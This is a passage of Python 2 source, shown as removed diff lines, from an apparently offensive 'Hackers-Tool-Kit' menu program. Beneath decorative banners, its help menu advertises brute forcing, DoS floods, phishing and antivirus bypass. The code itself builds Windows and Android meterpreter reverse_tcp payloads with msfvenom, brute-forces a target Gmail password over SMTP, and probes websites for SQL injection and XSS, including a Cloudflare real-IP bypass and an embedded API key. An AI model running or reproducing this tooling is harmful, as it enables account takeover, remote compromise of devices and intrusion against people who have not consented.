- ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner14(): - print """\033[34m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner15(): - print """\033[93m - __ _ - _wr"" "-q__ - _dP 9m_ - _#P 9#_ - d#@ \033[92mtype ? for help\033[93m 9#m - d## ### - J### ###L - {###K J###K - ]####K ___aaa___ J####F - __gmM######_ w#P"" ""9#m _d#####Mmw__ - _g##############mZ_ __g##############m_ - _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ - a###"" ,Z"#####@" '######"\g ""M##m - J#@" 0L "*## ##@" J# *#K - #" `# "_gmwgm_~ dF `#_ -7F "#_ ]#####F _dK JE -] *m__ ##### __g@" F - \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m - ` 0######_ ' - _0########_ - . _d#####^#####m__ , - "*w_________am#####P" ~9#####mw_________w*" - ""9@#####@M"" ""P@#####@M"" -\033[92m - ██░ ██ ▄▄▄█████▓ ██ ▄█▀ - ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ - ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ - ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ - ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ - ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ - ▒ ░▒░ ░ ░ ░ ░▒ ▒░ - ░ ░░ ░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░\033[0m - """.decode('utf-8') -def mainbanner16(): - print """\033[91m - :PB@Bk: - ,jB@@B@B@B@BBL. - 7G@B@B@BMMMMMB@B@B@Nr - :kB@B@@@MMOMOMOMOMMMM@B@B@B1, - :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. - 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr - G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S - @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ - B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B - @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ - @@OLB. BNB@MMOMOMM@BEB rBjM@B - @@ @ M OBOMOMM@q M .@ @@ - @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B - @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ - B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B - @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ - B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M - J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv - iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: - . B@M@B@MMM@B@B@B@MMM@@@M@B - @B@B.i@MBB@B@B@@BM@::B@B@ - B@@@ .B@B.:@B@ :B@B @B@O - :0 r@B@ B@@ .@B@: P: - vMB :@B@ :BO7 - ,B@B\033[0m - - \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m - ███████████████████████████ - type █?█ for help - ███ - \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ - ██ ██ \033[0m███\033[31m ██ ██▀ - ██ ██ \033[0m███\033[31m ██▄██ - ████████ \033[0m███\033[31m █████ - ██ ██ \033[0m███\033[31m ██ ██▄ - ██ ██ \033[0m███\033[31m ██ ██▄ - ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m - """.decode('utf-8') -def mainbanner17(): - print """ - - .---. - |---| - type |-\033[32m?\033[0m-| for help - |---| - .---^ - ^---. - :___________: - \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m - ███ ███ | |//| ███ ▄███▀ - ███ ███ | |//| ███▐██▀ - ███▄▄▄▄███ | |//| █████▀ - ███▀▀▀▀███ | |//| █████▄ - ███ ███ | |//| ███▐██▄ - ███ ███ | |.-| ███ ▀███▄ - \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m - \***/ - \*\033[91m/\033[31m - V\033[0m - """.decode('utf-8') -def mainbanner18(): - print """ - Type \033[31m?\033[0m For\033[31m Help\033[0m -\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ -║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ -║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ -║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ -║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m -║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ -║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ -║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ -╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ - """.decode('utf-8') -def mainbanner19(): - print """\033[31m - # # - # # - %# \033[0m@tuf_unkn0wn\033[31m ## - ,%/ /%, - %## ##% - &%## ##%& - ,%%#####/. ,/#####%%, - %&%%#####/ \033[0m████\033[31m /#####%%&% - .&&%%%&& \033[0m████\033[31m &&%%%&&. - /&%( \033[0m████\033[31m (%&( - \033[0m████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - ████ - \033[31m██████\033[31m type \033[0m█\033[31m??\033[0m█ \033[31mfor help ██████ -██ \033[0m██████████████████████████████\033[31m ██ -███████ \033[0m██████████████████████████████\033[31m ███████ -██ ██ \033[0m████ \033[31m ██ ██ - ██████ \033[0m████ \033[31m ██████ - ▒ ▓▒ ▒ ▒ ▓▒ ▒ - ░ ▒ ░ ██████ ░ ▒ ░ - ░ ░ ██ ░ ░ - ███████ - ██ ██ - ██████ - ▒ ▓▒ ▒ - ░ ▒ ░ - ░ ░\033[0m - """.decode('utf-8') - - -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,19) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() - if num == 8: - mainbanner8() - if num == 9: - mainbanner9() - if num == 10: - mainbanner10() - if num == 11: - mainbanner11() - if num == 12: - mainbanner12() - if num == 13: - mainbanner13() - if num == 14: - mainbanner14() - if num == 15: - mainbanner15() - if num == 16: - mainbanner16() - if num == 17: - mainbanner17() - if num == 18: - mainbanner18() - if num == 19: - mainbanner19() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -update : update the hackers-tool-kit -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -phpload : make a php reverse_tcp payload and start it in a multi handler -pyload : make a python reverse_tcp payload and start it in a multi handler -foxhis : gather firefox history from privileged javascript shell -rhawk : run the RED_HAWK script (info gathering tool) -nano : open nano text editor -compilec: compile a c file -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = 